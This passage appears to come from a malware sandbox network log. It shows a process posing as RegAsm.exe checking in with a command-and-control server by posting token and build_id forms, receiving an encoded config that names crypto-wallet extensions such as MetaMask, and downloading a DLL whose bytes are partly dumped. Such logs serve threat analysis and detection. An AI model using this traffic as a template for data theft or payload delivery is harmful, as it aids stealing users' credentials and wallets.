2024-04-29 20:13:04 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------BAECFHJEBAAFIEBGHIIECont
2024-04-29 20:13:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:05 UTC	5533	IN	Data Raw: 31 35 39 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1590TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:06 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 6269 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:06 UTC	6269	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EHIIIJDAAAAAAKECBFBACont
2024-04-29 20:13:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:08 UTC	242	OUT	GET /sqlx.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:08 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:08 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Sun, 28 Apr 2024 22:07:42 GMT Connection: close ETag: "662ec8ae-258600" Accept-Ranges: bytes
2024-04-29 20:13:08 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-04-29 20:13:08 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-04-29 20:13:08 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-04-29 20:13:08 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-04-29 20:13:09 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-04-29 20:13:09 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-04-29 20:13:09 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-04-29 20:13:09 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-04-29 20:13:09 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-04-29 20:13:09 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49753	23.6.204.109	443

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:10 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-29 20:13:10 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0790) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=39049 Date: Mon, 29 Apr 2024 20:13:10 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49754	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:13 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:13 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EGCFIDAFBFBAKFHJEGIJCont
2024-04-29 20:13:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:14 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49756	23.6.204.109	443

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:14 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-29 20:13:14 UTC	530	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=38955 Date: Mon, 29 Apr 2024 20:13:14 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-29 20:13:14 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49755	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:14 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:14 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------FCAECAKKFBGCBGDGIEHCContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------FCAECAKKFBGCBGDGIEHCContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------FCAECAKKFBGCBGDGIEHCCont
2024-04-29 20:13:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:15 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49757	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:15 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:15 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 Data Ascii: 